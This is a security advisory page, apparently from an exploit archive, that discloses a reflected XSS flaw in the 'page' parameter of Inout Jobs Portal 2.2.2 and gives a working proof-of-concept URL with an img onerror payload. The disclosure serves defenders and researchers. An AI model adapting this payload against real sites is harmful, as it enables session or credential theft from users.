Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : inoutscripts.com │
│ Vendor : Inout Scripts - Nesote Technologies Private Limited │
│ Software : Inout Jobs Portal 2.2.2 │
│ Vuln Type: Reflected XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /index.php
Method: GET
URL parameter 'page' is vulnerable to XSS
https://www.website.com/index.php?page=index%2findexyar11%3cimg%20src%3da%20onerror%3dalert(1)%3ex75a9
[-] Done
File Tags
- ActiveX[17] (932)
- Advisory[18] (80,020)
- Arbitrary[19] (15,754)
- BBS[20] (2,859)
- Bypass[21] (1,634)
- CGI[22] (1,020)
- Code Execution[23] (6,964)
- Conference[24] (675)
- Cracker[25] (840)
- CSRF[26] (3,294)
- DoS[27] (22,702)
- Encryption[28] (2,353)
- Exploit[29] (50,500)
- File Inclusion[30] (4,172)
- File Upload[31] (948)
- Firewall[32] (821)
- Info Disclosure[33] (2,672)
- Intrusion Detection[34] (869)
- Java[35] (2,941)
- JavaScript[36] (824)
- Kernel[37] (6,344)
- Local[38] (14,225)
- Magazine[39] (586)
- Overflow[40] (12,457)
- Perl[41] (1,418)
- PHP[42] (5,099)
- Proof of Concept[43] (2,293)
- Protocol[44] (3,442)
- Python[45] (1,468)
- Remote[46] (30,124)
- Root[47] (3,517)
- Rootkit[48] (501)
- Ruby[49] (597)
- Scanner[50] (1,633)
- Security Tool[51] (7,799)
- Shell[52] (3,113)
- Shellcode[53] (1,206)
- Sniffer[54] (889)
- Spoof[55] (2,173)
- SQL Injection[56] (16,134)
- TCP[57] (2,382)
- Trojan[58] (686)
- UDP[59] (878)
- Virus[60] (662)
- Vulnerability[61] (31,212)
- Web[62] (9,397)
- Whitepaper[63] (3,735)
- x86[64] (946)
- XSS[65] (17,517)
- Other[66]
File Archives
- January 2023[67]
- December 2022[68]
- November 2022[69]
- October 2022[70]
- September 2022[71]
- August 2022[72]
- July 2022[73]
- June 2022[74]
- May 2022[75]
- April 2022[76]
- March 2022[77]
- February 2022[78]
- Older[79]
Systems
- AIX[80] (426)
- Apple[81] (1,944)
- BSD[82] (370)
- CentOS[83] (55)
- Cisco[84] (1,917)
- Debian[85] (6,660)
- Fedora[86] (1,690)
- FreeBSD[87] (1,242)
- Gentoo[88] (4,288)
- HPUX[89] (878)
- iOS[90] (337)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (44,568)
- Mac OS X[95] (684)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (479)
- RedHat[99] (12,614)
- Slackware[100] (941)
- Solaris[101] (1,609)
- SUSE[102] (1,444)
- Ubuntu[103] (8,257)
- UNIX[104] (9,181)
- UnixWare[105] (185)
- Windows[106] (6,517)
- Other[107]
